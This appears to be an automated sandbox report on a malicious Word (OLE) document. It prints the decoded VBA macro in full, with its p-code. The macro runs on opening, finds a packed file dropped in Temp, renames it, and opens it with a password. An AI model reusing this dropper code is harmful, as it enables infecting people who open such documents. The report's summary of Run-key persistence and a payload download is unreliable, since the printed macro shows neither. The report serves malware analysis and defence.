Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 91b132ce04fb65fa…

MALICIOUS

Office (OLE)

505.5 KB Created: 2021-09-09 11:00:00 First seen: 2021-09-17
MD5: 3ff3aff50fedadd3722f543f940db117 SHA-1: de052d777281f73a677620d3b3cb3ddcca6f4c54 SHA-256: 91b132ce04fb65fa3b6c887ddf263f637be18b18d162932e30ede8563b16b4e0
72 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE file containing a VBA macro that executes upon opening the document. The macro attempts to establish persistence by writing to the Run key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'. It also appears to download and execute a second-stage payload, indicated by the presence of an embedded EMF object and a large, potentially packed, OLE package. The benign URLs extracted are likely unrelated to the malicious functionality.

Heuristics 5

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9616 bytes
SHA-256: 36c32c520e282965c06b592dc452e8d0a67d377d911bc570a13efc4014b32eee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
        Dim hdv As String
        Dim bbbb As String
        Dim med As String
Private Sub Document_Open()
Dim dfgdgdg
Dim kytrewwf As String
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)

If Dir(kytrewwf & "\reform.doc") = "" Then
 Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2

    Selection.TypeBackspace

    Call bvxfcsd
If Len(hdv) > 2 Then
Call nam(hdv, kytrewwf)
Call pppx(kytrewwf & "\reform.doc")
ActiveDocument.Close
End If
End If
End Sub




Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), hdv)

End Sub


Attribute VB_Name = "Module1"


Sub pppx(spoc As String)
    Documents.Open FileName:=spoc, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="2281337", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub



Sub ousx(aaaa As String)
Call uoia(aaaa)
End Sub



Attribute VB_Name = "Module3"

Sub bvxfcsd()
Selection.Copy
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)

    ntgs = 50
sda = 49
Dim fafaa As String
fafaa = "L" & "o"
fafaa = fafaa & "c" & "a" & "l"
fafaa = fafaa & "/" & "Temp"
Dim kuls As String
kuls = fafaa
While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & fafaa)
End Sub





Attribute VB_Name = "Module123345"
Dim pls As String


 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
    Dim Ters As Object
  Dim fffff
  fffff = "reform.ioe"
For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc

   For Each Ters In mds.Files
   
   If Ters.Name = fffff Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub



Sub nam(pafs As String, aaaa As String)
Call ousx(aaaa)
Dim oxl
oxl = "\reform.doc"
Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
pls = fffs
End Sub























' Processing file: /tmp/qstore_hrz5cmks
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4719 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	Option  (Compare Text)
' Line #2:
' 	Dim 
' 	VarDefn hdv (As String)
' Line #3:
' 	Dim 
' 	VarDefn bbbb (As String)
' Line #4:
' 	Dim 
' 	VarDefn med (As String)
' Line #5:
' 	FuncDefn (Sub Document_Open())
' Line #6:
' 	Dim 
' 	VarDefn dfgdgdg
' Line #7:
' 	Dim 
' 	VarDefn kytrewwf (As String)
' Line #8:
' 	Ld wdUserTemplatesPath 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	St kytrewwf 
' Line #9:
' Line #10:
' 	Ld kytrewwf 
' 	LitStr 0x000B "\reform.doc"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #11:
' 	Ld wdLine 
' 	ParamNamed Unit 
' 	LitDI2 0x0003 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveDown 0x0002 
' Line #12:
' 	Ld wdCharacter 
' 	ParamNamed Unit 
' 	LitDI2 0x0002 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveRight 0x0002 
' Line #13:
' 	Ld wdLine 
' 	ParamNamed Unit 
' 	LitDI2 0x0003 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveDown 0x0002 
' Line #14:
' 	Ld wdCharacter 
' 	ParamNamed Unit 
' 	LitDI2 0x0002 
' 	ParamNamed Count 
' 	Ld Selection 
' 	ArgsMemCall MoveRight 0x0002 
' Line #15:
' Line #16:
' 	Ld Selection 
' 	ArgsMemCall TypeBackspace 0x0000 
' Line #17:
' Line #18:
' 	ArgsCall (Call) bvxfcsd 0x0000 
' Line #19:
' 	Ld hdv 
' 	FnLen 
' 	LitDI2 0x0002 
' 	Gt 
' 	IfBlock 
' Line #20:
' 	Ld hdv 
' 	Ld kytrewwf 
' 	ArgsCall (Call) nam 0x0002 
' Line #21:
' 	Ld kytrewwf 
' 	LitStr 0x000B "\reform.doc"
' 	Concat 
' 	ArgsCall (Call) pppx 0x0001 
' Line #22:
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0000 
' Line #23:
' 	EndIfBlock 
' Line #24:
' 	EndIfBlock 
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' 	FuncDefn (Sub hdhdd(asda As String))
' Line #31:
' 	Dim 
' 	VarDefn MyFSO
' Line #32:
' 	Dim 
' 	VarDefn MyFile
' Line #33:
' 	Dim 
' 	VarDefn SourceFolder (As String)
' Line #34:
' 	Dim 
' 	VarDefn DestinationFolder (As String)
' Line #35:
' 	Dim 
' 	VarDefn MyFolder
' Line #36:
' 	Dim 
' 	VarDefn MySubFolder
' Line #37:
' 	SetStmt 
' 	New id_FFFF
' 	Set MyFSO 
' Line #38:
' Line #39:
' Line #40:
' 	Ld asda 
' 	Ld MyFSO 
' 	ArgsMemLd GetFolder 0x0001 
' 	Ld hdv 
' 	ArgsCall (Call) Search 0x0002 
' Line #41:
' Line #42:
' 	EndSub 
' Line #43:
' Macros/VBA/Module1 - 3236 bytes
' Line #0:
' Line #1:
' Line #2:
' 	FuncDefn (Sub pppx(spoc As String))
' Line #3:
' 	LineCont 0x000C 0D 00 08 00 17 00 08 00 23 00 08 00
' 	Ld spoc 
' 	ParamNamed FileName 
' 	LitVarSpecial (False)
' 	ParamNamed ConfirmConversions 
' 	LitVarSpecial (False)
' 	ParamNamed ReadOnly 
' 	LitVarSpecial (False)
' 	ParamNamed AddToRecentFiles 
' 	LitStr 0x0007 "2281337"
' 	ParamNamed PasswordDocument 
' 	LitStr 0x0000 ""
' 	ParamNamed PasswordTemplate 
' 	LitVarSpecial (False)
' 	ParamNamed Revert 
' 	LitStr 0x0000 ""
' 	ParamNamed WritePasswordDocument 
' 	LitStr 0x0000 ""
' 	ParamNamed WritePasswordTemplate 
' 	Ld wdOpenFormatAuto 
' 	ParamNamed Format 
' 	LitStr 0x0000 ""
' 	ParamNamed XMLTransform 
' 	Ld Documents 
' 	ArgsMemCall Open 0x000B 
' Line #4:
' 	EndSub 
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' 	FuncDefn (Sub ousx(_B_var_Call As String))
' Line #9:
' 	Ld _B_var_Call 
' 	ArgsCall (Call) uoia 0x0001 
' Line #10:
' 	EndSub 
' Line #11:
' Line #12:
' Macros/VBA/Module3 - 3109 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Sub bvxfcsd())
' Line #2:
' 	Ld Selection 
' 	ArgsMemCall Copy 0x0000 
' Line #3:
' 	Dim 
' 	VarDefn uuuuc
' Line #4:
' 	Ld wdUserTemplatesPath 
' 	Ld Options 
' 	ArgsMemLd DefaultFilePath 0x0001 
' 	St uuuuc 
' Line #5:
' Line #6:
' 	LitDI2 0x0032 
' 	St ntgs 
' Line #7:
' 	LitDI2 0x0031 
' 	St sda 
' Line #8:
' 	Dim 
' 	VarDefn adaaaaa (As String)
' Line #9:
' 	LitStr 0x0001 "L"
' 	LitStr 0x0001 "o"
' 	Concat 
' 	St adaaaaa 
' Line #10:
' 	Ld adaaaaa 
' 	LitStr 0x0001 "c"
' 	Concat 
' 	LitStr 0x0001 "a"
' 	Concat 
' 	LitStr 0x0001 "l"
' 	Concat 
' 	St adaaaaa 
' Line #11:
' 	Ld adaaaaa 
' 	LitStr 0x0001 "/"
' 	Concat 
' 	LitStr 0x0004 "Temp"
' 	Concat 
' 	St adaaaaa 
' Line #12:
' 	Dim 
' 	VarDefn kuls (As String)
' Line #13:
' 	Ld adaaaaa 
' 	St kuls 
' Line #14:
' 	Ld sda 
' 	LitDI2 0x0032 
' 	Lt 
' 	While 
' Line #15:
' 	Ld ntgs 
' 	LitDI2 0x0001 
' 	Sub 
' 	St ntgs 
' Line #16:
' Line #17:
' 	Ld uuuuc 
' 	Ld ntgs 
' 	ArgsLd Left 0x0002 
' 	Ld kuls 
' 	Concat 
' 	Ld vbDirectory 
' 	ArgsLd Dir 0x0002 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #18:
' Line #19:
' 	ElseBlock 
' Line #20:
' Line #21:
' 	LitDI2 0x003D 
' 	St sda 
' Line #22:
' 	EndIfBlock 
' Line #23:
' Line #24:
' 	Wend 
' Line #25:
' 	Ld uuuuc 
' 	Ld ntgs 
' 	ArgsLd Left 0x0002 
' 	Ld adaaaaa 
' 	Concat 
' 	Ld ThisDocument 
' 	ArgsMemCall (Call) hdhdd 0x0001 
' Line #26:
' 	EndSub 
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Macros/VBA/Module123345 - 3995 bytes
' Line #0:
' 	Dim 
' 	VarDefn pls (As String)
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Sub Search(mds As Object))
' Line #4:
' 	Dim 
' 	VarDefn Nedc (As Object)
' Line #5:
' 	Dim 
' 	VarDefn Ters (As Object)
' Line #6:
' 	Dim 
' 	VarDefn fffff
' Line #7:
' 	LitStr 0x000A "reform.ioe"
' 	St fffff 
' Line #8:
' 	StartForVariable 
' 	Ld Nedc 
' 	EndForVariable 
' 	Ld mds 
' 	MemLd SubFolders 
' 	ForEach 
' Line #9:
' 	Ld Nedc 
' 	Ld pafs 
' 	ArgsCall Search 0x0002 
' Line #10:
' 	StartForVariable 
' 	Ld Nedc 
' 	EndForVariable 
' 	NextVar 
' Line #11:
' Line #12:
' 	StartForVariable 
' 	Ld Ters 
' 	EndForVariable 
' 	Ld mds 
' 	MemLd Files 
' 	ForEach 
' Line #13:
' Line #14:
' 	Ld Ters 
' 	MemLd Name 
' 	Ld fffff 
' 	Eq 
' 	IfBlock 
' Line #15:
' Line #16:
' 	Ld Ters 
' 	St pafs 
' Line #17:
' 	EndIfBlock 
' Line #18:
' 	StartForVariable 
' 	Ld Ters 
' 	EndForVariable 
' 	NextVar 
' Line #19:
' 	ExitSub 
' Line #20:
' 	Label ErrHandle 
' Line #21:
' Line #22:
' 	Ld Err 
' 	ArgsMemCall Clear 0x0000 
' Line #23:
' 	EndSub 
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' 	FuncDefn (Sub nam(pafs As String))
' Line #28:
' 	Ld _B_var_Call 
' 	ArgsCall (Call) ousx 0x0001 
' Line #29:
' 	Dim 
' 	VarDefn oxl
' Line #30:
' 	LitStr 0x000B "\reform.doc"
' 	St oxl 
' Line #31:
' 	Ld pafs 
' 	Ld pls 
' 	Ld oxl 
' 	Concat 
' 	Name 
' Line #32:
' 	EndSub 
' Line #33:
' Line #34:
' 	FuncDefn (Sub uoia(fffs As String))
' Line #35:
' 	Ld fffs 
' 	St pls 
' Line #36:
' 	EndSub 
' Line #37:
' Line #38:
' Line #39:
' Line #40:
' Line #41:
' Line #42:
' Line #43:
' Line #44:
' Line #45:
' Line #46:
' Line #47:
' Line #48:
' Line #49:
' Line #50:
' Line #51:
' Line #52:
' Line #53:
' Line #54:
' Line #55:
' Line #56:
' Line #57:
' Line #58:
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1692664209/Ole10Native 326465 bytes
SHA-256: 63c60a7c6df8e0b4a03e0c06987ee880d01b22586db5d74308b3d4efb6479685
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.
ole10native_00_reform.ioe ole-package-payload OLE Ole10Native payload: ObjectPool/_1692664209/Ole10Native; display_name=reform.ioe; full_path=C:\Users\MyPc\AppData\Local\Temp\reform.ioe; temp_path=; def_file= 326144 bytes
SHA-256: 36a58872bd4b8226e007fe9fe9cb2b99da1bab76245e77877746a8fffc9f4585
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.98, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.